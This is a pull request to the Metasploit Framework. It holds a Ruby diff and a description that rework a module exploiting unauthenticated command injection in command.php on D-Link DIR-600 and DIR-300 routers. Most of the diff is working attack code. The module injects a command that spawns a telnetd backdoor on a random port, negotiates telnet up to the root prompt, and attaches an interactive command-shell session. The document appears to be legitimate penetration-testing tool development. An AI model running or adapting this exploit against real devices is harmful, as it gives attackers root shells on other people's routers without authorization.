### PR TITLE
Fix the way to get a session over a telnet connection (dlink_command_php_exec_noauth)

### DIFF
--- a/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
@@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking
 
 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Auxiliary::CommandShell
 
 	def initialize(info = {})
 		super(update_info(info,
@@ -20,10 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				Different D-Link Routers are vulnerable to OS command injection via the web
 				interface. The vulnerability exists in command.php, which is accessible without
 				authentication. This module has been tested with the versions DIR-600 2.14b01,
-				DIR-300 rev B 2.13. Two target are included, the first one starts a telnetd service
-				and establish a session over it, the second one runs commands via the CMD target.
-				There is no wget or tftp client to upload an elf backdoor easily. According to the
-				vulnerability discoverer, more D-Link devices may affected.
+				DIR-300 rev B 2.13.
 			},
 			'Author'      =>
 				[
@@ -42,61 +38,45 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DisclosureDate' => 'Feb 04 2013',
 			'Privileged'     => true,
-			'Platform'       => ['linux','unix'],
-			'Payload'        =>
+			'Platform'       => 'unix',
+			'Arch'        => ARCH_CMD,
+			'Payload'     =>
 				{
-					'DisableNops' => true,
+					'Compat'  => {
+						'PayloadType'    => 'cmd_interact',
+						'ConnectionType' => 'find',
+					},
 				},
+			'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
 			'Targets'        =>
 				[
-					[ 'CMD',	#all devices
-						{
-						'Arch' => ARCH_CMD,
-						'Platform' => 'unix'
-						}
-					],
-					[ 'Telnet',	#all devices - default target
-						{
-						'Arch' => ARCH_CMD,
-						'Platform' => 'unix'
-						}
-					],
+					[ 'Automatic',	{ } ]
 				],
-			'DefaultTarget'  => 1
+			'DefaultTarget'  => 0
 			))
+
+		register_advanced_options(
+			[
+				OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+				OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
+				OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
+			], self.class)
+
+	end
+
+	def tel_timeout
+		(datastore['TelnetTimeout'] || 10).to_i
+	end
+
+	def banner_timeout
+		(datastore['TelnetBannerTimeout'] || 25).to_i
+	end
+
+	def session_timeout
+		(datastore['SessionTimeout'] || 10).to_i
 	end
 
 	def exploit
-		if target.name =~ /CMD/
-			exploit_cmd
-		else
-			exploit_telnet
-		end
-	end
-
-	def exploit_cmd
-		if not (datastore['CMD'])
-			fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
-		end
-		cmd = "#{payload.encoded}; echo end"
-		print_status("#{rhost}:#{rport} - Sending exploit request...")
-		res = request(cmd)
-		if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux, HTTP\/1.1, DIR/)
-			fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-		end
-
-		if res.body.include?("end")
-			print_good("#{rhost}:#{rport} - Exploited successfully\n")
-			vprint_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
-			vprint_line("#{rhost}:#{rport} - Output: #{res.body}")
-		else
-			fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-		end
-
-		return
-	end
-
-	def exploit_telnet
 		telnetport = rand(65535)
 
 		print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
@@ -107,39 +87,33 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{rhost}:#{rport} - Sending exploit request...")
 		request(cmd)
 
-		begin
-			sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+		print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+		sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
 
-			if sock
-				print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
-				add_socket(sock)
-			else
-				fail_with(Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
-			end
-
-			print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
-			auth_info = {
-				:host   => rhost,
-				:port   => telnetport,
-				:sname => 'telnet',
-				:user   => "",
-				:pass	=> "",
-				:source_type => "exploit",
-				:active => true
-			}
-			report_auth_info(auth_info)
-			merge_me = {
-				'USERPASS_FILE' => nil,
-				'USER_FILE'     => nil,
-				'PASS_FILE'     => nil,
-				'USERNAME'      => nil,
-				'PASSWORD'      => nil
-			}
-			start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-		rescue
-			fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not handle the backdoor service")
+		if sock.nil?
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
 		end
-		return
+
+		print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+		prompt = negotiate_telnet(sock)
+		if prompt.nil?
+			sock.close
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+		else
+			print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
+		end
+
+		print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
+		begin
+			Timeout.timeout(session_timeout) do
+				activated = handler(sock)
+				while(activated !~ /claimed/)
+					activated = handler(sock)
+				end
+			end
+		rescue ::Timeout::Error
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
+		end
 	end
 
 	def request(cmd)
@@ -156,7 +130,24 @@ class Metasploit3 < Msf::Exploit::Remote
 			})
 		return res
 		rescue ::Rex::ConnectionError
-			fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
 		end
 	end
+
+	def negotiate_telnet(sock)
+		begin
+			Timeout.timeout(banner_timeout) do
+				while(true)
+					data = sock.get_once(-1, tel_timeout)
+					return nil if not data or data.length == 0
+					if data =~ /\x23\x20$/
+						return true
+					end
+				end
+			end
+		rescue ::Timeout::Error
+			return nil
+		end
+	end
+
 end


### PR DESCRIPTION
While working with @m-1-k-3 on #2188 we've figured out which the last modules trying to get a session through the telnet service were wrong because of two things:

Even when there isn't authentication a telnet negotiation is required, which mainly is to read from the socket until the prompt is received, in order to flush it.

The correct way to create a session from an exploit isn't to use Msf::Auxiliary::CommandShell::start_session, but to use the cmd/unix/interact payload (find type) and allow the handler to start the session over the telnet connection, so callbacks like "on_new_session" are available once the session is created.

This is the third (and last) pull request trying to fix the incorrect modules:

modules/exploits/linux/http/dlink_dir300_exec_telnet.rb  (#2225)
modules/exploits/linux/http/dlink_upnp_exec_noauth.rb (#2248)
modules/exploits/linux/http/dlink_command_php_exec_noauth.rb (this pull request tries to fix this one)

Any feedback about the new way of proceeding in order to get a session from a telnet connection is welcome. If there is something wrong please let me know!

On the other hand, a simulation environment can be build with Ubuntu and busybox, but if you need the real data (screenshots and pcap's) for verification of the changes working against a real device, please contact me directly.

See also #2225 and #2248
